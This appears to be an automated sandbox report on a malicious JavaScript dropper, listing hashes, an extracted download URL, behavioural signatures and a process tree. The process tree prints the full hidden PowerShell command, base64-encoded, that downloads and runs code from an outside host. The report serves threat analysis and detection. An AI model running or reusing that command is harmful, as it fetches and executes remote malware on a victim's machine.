Analysis
-
max time kernel
158s -
max time network
167s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
02-01-2024 15:36
Static task
static1
Behavioral task
behavioral1
Sample
7e2e3ee2e92ce9d49d7bbaa6006e4d01.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7e2e3ee2e92ce9d49d7bbaa6006e4d01.js
Resource
win10v2004-20231215-en
General
-
Target
7e2e3ee2e92ce9d49d7bbaa6006e4d01.js
-
Size
96KB
-
MD5
7e2e3ee2e92ce9d49d7bbaa6006e4d01
-
SHA1
2a8572fed31328ece599c7e468836bd0fbdc5b30
-
SHA256
89817a537dc9d9076de9547767fc4205979ab7f4537d38d609f1975540871661
-
SHA512
9a624cae94a24fb27da867c19d39248d2aa2014d2a9e703032dbd21d799089dc947c3c56f820c56ca03b21990253de2f945cd6cf3872e54cfe3c9cf4ec310c13
-
SSDEEP
3072:yE9Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5ea+:h9Ry9RuXqW4SzUHmLKeMMU7GwWBPwVG7
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 18 1944 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1944 powershell.exe 1944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1944 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2848 wrote to memory of 4732 2848 wscript.exe 90 PID 2848 wrote to memory of 4732 2848 wscript.exe 90 PID 4732 wrote to memory of 1944 4732 cmd.exe 93 PID 4732 wrote to memory of 1944 4732 cmd.exe 93
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\7e2e3ee2e92ce9d49d7bbaa6006e4d01.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82